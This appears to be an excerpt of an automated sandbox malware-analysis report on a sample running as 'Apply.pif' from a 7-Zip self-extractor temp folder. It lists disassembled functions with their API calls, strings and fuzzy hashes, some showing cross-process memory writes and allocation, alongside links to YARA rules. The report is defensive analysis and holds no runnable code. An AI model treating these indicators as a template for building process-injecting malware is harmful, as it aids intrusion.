Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 06e68b7ae60b9387bca7f75cc87143728941c641db5e43c7b75a4421bf36e338
Instruction ID: ef0f51c038e0683372799474689869678742908249d657cecdbcb755f089160f
Opcode Fuzzy Hash: 06e68b7ae60b9387bca7f75cc87143728941c641db5e43c7b75a4421bf36e338
Instruction Fuzzy Hash: E2F05E7096A6259BD625FF18BC014997FA0FB247507108146F820D6671CB320953FFD1

Function 008697FB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0086980A
StrokeAndFillPath.GDI32(?,?,008A7807,00000000,?,?,?), ref: 00869826
SelectObject.GDI32(?,00000000), ref: 00869839
DeleteObject.GDI32 ref: 0086984C
StrokePath.GDI32(?), ref: 00869867

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 17cc03dac9d2d4cac1c36f56ca9b7edd3fad15ec1807cce928a0593612953cba
Instruction ID: 6dc41e4faed6f63b5f4ad9e4fb1e9cfcfee69d3c31ceec81dc6331071f680330
Opcode Fuzzy Hash: 17cc03dac9d2d4cac1c36f56ca9b7edd3fad15ec1807cce928a0593612953cba
Instruction Fuzzy Hash: 60F01934019B49FBDB255F25EE48B687B69FB42322F088224E4658A0F0C7318896EF91

Function 00881207 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 008813B9
__freea.LIBCMT ref: 008813D7

Part of subcall function 008817F7: _free.LIBCMT ref: 0088180F

Strings

am/pm, xrefs: 0088143A
a/p, xrefs: 0088149E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: c51adbf382410d328726619aeeb7f544c36da2c4e638a5bca7f7dc6d23d95c2b
Instruction ID: c9cf844bb3951c52ff76fc17d4d2f637926903d29afeb4c188335eec7e0c7e39
Opcode Fuzzy Hash: c51adbf382410d328726619aeeb7f544c36da2c4e638a5bca7f7dc6d23d95c2b
Instruction Fuzzy Hash: 90D1027190020ADACF24FF68C84DAFAB7B9FF25700F284119E546EB650EB758D82CB51

Function 008D8305 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00870592: EnterCriticalSection.KERNEL32(009216FC,?,?,?,0085C0BA,00923560,00922408,00000001,00000000,CMDLINERAW,?,00922408,?,?,?,00000000), ref: 0087059D
Part of subcall function 00870592: LeaveCriticalSection.KERNEL32(009216FC,?,?,?,0085C0BA,00923560,00922408,00000001,00000000,CMDLINERAW,?,00922408,?,?,?,00000000), ref: 008705DA

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008703F3: __onexit.LIBCMT ref: 008703F9

__Init_thread_footer.LIBCMT ref: 008D8382

Part of subcall function 00870548: EnterCriticalSection.KERNEL32(009216FC,?,?,0085C0E8,00923560,00892799,00922408,00000001,00000000,CMDLINERAW,?,00922408,?,?,?,00000000), ref: 00870552
Part of subcall function 00870548: LeaveCriticalSection.KERNEL32(009216FC,?,0085C0E8,00923560,00892799,00922408,00000001,00000000,CMDLINERAW,?,00922408,?,?,?,00000000), ref: 00870585

Strings

G, xrefs: 008D8406
Variable must be of type 'Object'., xrefs: 008D83C1
5, xrefs: 008D83FF

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 2334de15dd8386cb13ee05ec5373313119edf91961d7fd1d59f22a7222b23ec2
Instruction ID: 6a59c28eaa4f36145bcc17acabcc4ab7952abcedfe0051994052e9758e520327
Opcode Fuzzy Hash: 2334de15dd8386cb13ee05ec5373313119edf91961d7fd1d59f22a7222b23ec2
Instruction Fuzzy Hash: F6915970A00209EFCB14EF98D8919ADB7B2FF48704B14825AF906EB391DB719E45CB52

Function 008B2DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008BBB04: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008B28B2,?,?,00000034,00000800,?,00000034), ref: 008BBB2E

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008B2E42

Part of subcall function 008BBACF: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008B28E1,?,?,00000800,?,00001073,00000000,?,?), ref: 008BBAF9

Part of subcall function 008BBA2B: GetWindowThreadProcessId.USER32(?,?), ref: 008BBA56
Part of subcall function 008BBA2B: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008B2876,00000034,?,?,00001004,00000000,00000000), ref: 008BBA66
Part of subcall function 008BBA2B: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008B2876,00000034,?,?,00001004,00000000,00000000), ref: 008BBA7C

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008B2EAF
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008B2EFC

Strings

@, xrefs: 008B2F14

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: f4208063aa52cf483525dd122a0c3c03158cb80ab55606f9b6c2ab2af5d95113
Instruction ID: d7fe32aaddba3109f507d19e148b116a67eb9a52a1ed0b20149d26bc609f0a7e
Opcode Fuzzy Hash: f4208063aa52cf483525dd122a0c3c03158cb80ab55606f9b6c2ab2af5d95113
Instruction Fuzzy Hash: 3E412E76901218AFDB11DFA8CC85AEEB7B8FF05300F004055FA45B7291DB71AE89CB61

Function 008819EE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif,00000104), ref: 00881A29
_free.LIBCMT ref: 00881AF4
_free.LIBCMT ref: 00881AFE

Strings

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif, xrefs: 00881A20, 00881A27, 00881A56, 00881A8E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
API String ID: 2506810119-3516114297
Opcode ID: da60bf60cc0c0e33b04d826a906d141d4a9f1fb53236ff2699e4738b34d1ccc5
Instruction ID: cc07cbe4681baa4e96933efb4091a5d54897dbc095bc8a4a08adf0ae60d02149
Opcode Fuzzy Hash: da60bf60cc0c0e33b04d826a906d141d4a9f1fb53236ff2699e4738b34d1ccc5
Instruction Fuzzy Hash: 2E319E71A05228EFDB25EB99DC88C9EBBBCFF84710B104066E804E7210DA709E42DB91

Function 008BC862 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008BC8EB
DeleteMenu.USER32(?,00000007,00000000), ref: 008BC931
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009229B0,01589310), ref: 008BC97A

Strings

0, xrefs: 008BC8C4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: fdccabdce5a467c118395a8afac5bc7b51195f31d51c6d1955e84604dfbe10c4
Instruction ID: 558208bb7af84fea24ef9eb13c71cdd7557b4b8123bc4b477bbfb4a7a45b91a1
Opcode Fuzzy Hash: fdccabdce5a467c118395a8afac5bc7b51195f31d51c6d1955e84604dfbe10c4
Instruction Fuzzy Hash: 75417E312043419FE720DF28C885F9ABBE4FB85324F14462EF9A5DB391DB30A904CB66

Function 008E4BD6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008EDC1C,00000000,?,?,?,?), ref: 008E4C6A
GetWindowLongW.USER32 ref: 008E4C87
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008E4C97

Strings

SysTreeView32, xrefs: 008E4C3C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 83723c668828c19352df6db72e4681487d746f9e4a0c95a6c8f358e973b473a5
Instruction ID: 6a4c8302d3de8b7ff44b3f60dccb214acbbb4dfd449ce2792b2443a1c39b76eb
Opcode Fuzzy Hash: 83723c668828c19352df6db72e4681487d746f9e4a0c95a6c8f358e973b473a5
Instruction Fuzzy Hash: DF31CD31200649ABDB118F39CC85BEA7BA9FB09334F204724F979D32E1DB70AC559B50

Function 008D37D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008D3AE2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,008D37FE,?,?), ref: 008D3AFF

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008D3801
_wcslen.LIBCMT ref: 008D3822
htons.WSOCK32(00000000,?,?,00000000), ref: 008D388D

Strings

255.255.255.255, xrefs: 008D381C, 008D3821

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 40fcf67837092af9e214a3f6abc8dd00e7c759b3275510a982473cf65ccb4dfb
Instruction ID: 0a6df737b104d513854196f06108316b5f6e0a1dad01033b5fb1703a1d485852
Opcode Fuzzy Hash: 40fcf67837092af9e214a3f6abc8dd00e7c759b3275510a982473cf65ccb4dfb
Instruction Fuzzy Hash: CC31CF35600201DFCB10CF68C485A697BE1FF14318F2482AAF816CB3A2C771EE45DB62

Function 008E4676 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008E46FE
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008E4712
SendMessageW.USER32(?,00001002,00000000,?), ref: 008E4736

Strings

SysMonthCal32, xrefs: 008E46C9

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 421ff60088b22461a842300880a5a21d05f3d484884f9dd79c7adad838bbea35
Instruction ID: 092df2c96e9eba01281ca7fe1cb4ca39b8c020a7d18b5b1d14f1c9769741cd96
Opcode Fuzzy Hash: 421ff60088b22461a842300880a5a21d05f3d484884f9dd79c7adad838bbea35
Instruction Fuzzy Hash: A721D332600258BBDF118F95CC82FEA3BA5FF49714F110114FE19AB1D0D6B1A8559B90

Function 008E4E13 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008E4EC5
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008E4ED3
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008E4EDA

Strings

msctls_updown32, xrefs: 008E4E44

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 107bc8db11c77e8bbdc1ab6a6f76839ba364ac5b8c3b7d2d61bc575098ae2d76
Instruction ID: d858f5b3ef869bd27701f7eff01ff5c03ed1782ab055895936fc38f0efd38e01
Opcode Fuzzy Hash: 107bc8db11c77e8bbdc1ab6a6f76839ba364ac5b8c3b7d2d61bc575098ae2d76
Instruction Fuzzy Hash: D42189B5600249BFEB10DF69DCC1DBB37ACFB4A3A8B000059FA05DB261CB31EC519A60

Function 008C5163 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008C5177
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008C51CB
SetErrorMode.KERNEL32(00000000,?,?,008EDC1C), ref: 008C523F

Strings

%lu, xrefs: 008C51DE

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 55ce04208e58e93ed1bc6144c441b03aab60c52c1f311be9a76407d809f9ba25
Instruction ID: 478eaad937ef7db906e9f73455d44c0b1db1218866657dd3f6f539cf61087da8
Opcode Fuzzy Hash: 55ce04208e58e93ed1bc6144c441b03aab60c52c1f311be9a76407d809f9ba25
Instruction Fuzzy Hash: 28311275A00219AFDB11DF58C985EAAB7F8FF04304F144099E909DB352D771EE46CB61

Function 008E49AB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008E4A0F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008E4A24
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008E4A31

Strings

msctls_trackbar32, xrefs: 008E49E6

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 20aef1bef133ed74e731981d9e873bf9340beaa8d2e5395adc5d182eb9bf5184
Instruction ID: 09042f9ac74f197ee63c14268b1496cd3f86e8f8826e3ad5b31e800621504494
Opcode Fuzzy Hash: 20aef1bef133ed74e731981d9e873bf9340beaa8d2e5395adc5d182eb9bf5184
Instruction Fuzzy Hash: A7110631280288BEEF205F2ACC46FEB3BACFF86B64F010524FA55E71A1D671D8519B14

Function 008B3633 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

Part of subcall function 008B3489: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008B34A7
Part of subcall function 008B3489: GetWindowThreadProcessId.USER32(?,00000000), ref: 008B34B8
Part of subcall function 008B3489: GetCurrentThreadId.KERNEL32 ref: 008B34BF
Part of subcall function 008B3489: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008B34C6

GetFocus.USER32 ref: 008B3659

Part of subcall function 008B34D0: GetParent.USER32(00000000), ref: 008B34DB

GetClassNameW.USER32(?,?,00000100), ref: 008B36A4
EnumChildWindows.USER32(?,008B371C), ref: 008B36CC

Strings

%s%d, xrefs: 008B36E0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 97f7669fd195c88f3801b46123f91b45c5547971190d50b7bd7d6e6145e3830f
Instruction ID: 773bf888eea5fe6b942e7abd01dc6a06b497733cbc43ffc79174d830d1f58636
Opcode Fuzzy Hash: 97f7669fd195c88f3801b46123f91b45c5547971190d50b7bd7d6e6145e3830f
Instruction Fuzzy Hash: 921193B56002096BCF127FA49CC5AEA3B6AFF94304F044075FD09DB393DE719A498B65

Function 008E6042 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008E6081
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008E60AE
DrawMenuBar.USER32(?), ref: 008E60BD

Strings

0, xrefs: 008E604F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: d3145e25130d2cdd84b1feec9509fb7bafe7c6a069a8b81d59453d48ed7a510b
Instruction ID: f01d5ea07c5ef4e30144bc1725276167345cb0a3728cee18780012f53264747a
Opcode Fuzzy Hash: d3145e25130d2cdd84b1feec9509fb7bafe7c6a069a8b81d59453d48ed7a510b
Instruction Fuzzy Hash: 59016931500298EFDB619F56DC84BAA7BB4FB06354F1480A9E849EA150DB318A98EF21

Function 008B0706 Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf043f8baba7f2efa3e804c9d86677a2fc7c1a1ce7bb704aba8d095a34e647da
Instruction ID: e54b9f9bdce6e6928877058eeabdee53d29658a5cda336962c7e572feb5dec89
Opcode Fuzzy Hash: cf043f8baba7f2efa3e804c9d86677a2fc7c1a1ce7bb704aba8d095a34e647da
Instruction Fuzzy Hash: 10C12875A0021AEFDB14CF94C894AAABBB5FF48704F248598E905EB351D731EE81CF90

Function 008841D0 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0088425B
__alldvrm.LIBCMT ref: 0088445C
__alldvrm.LIBCMT ref: 0088447E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
Instruction ID: 5916ba13736e2a4cea3dcd36d7bd227408662086c24f8703c785467efaa8c45e
Opcode Fuzzy Hash: 9ad14dec4bb4a0c2043c4c5fa7c098021884fe155f7a13ee0405fd2ef3dcf7e8
Instruction Fuzzy Hash: 0FA14533A0538B9FEB21EF58C881BAEBBE5FF11310F184169E585DB282C3789941C755

Function 008B0ABD Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

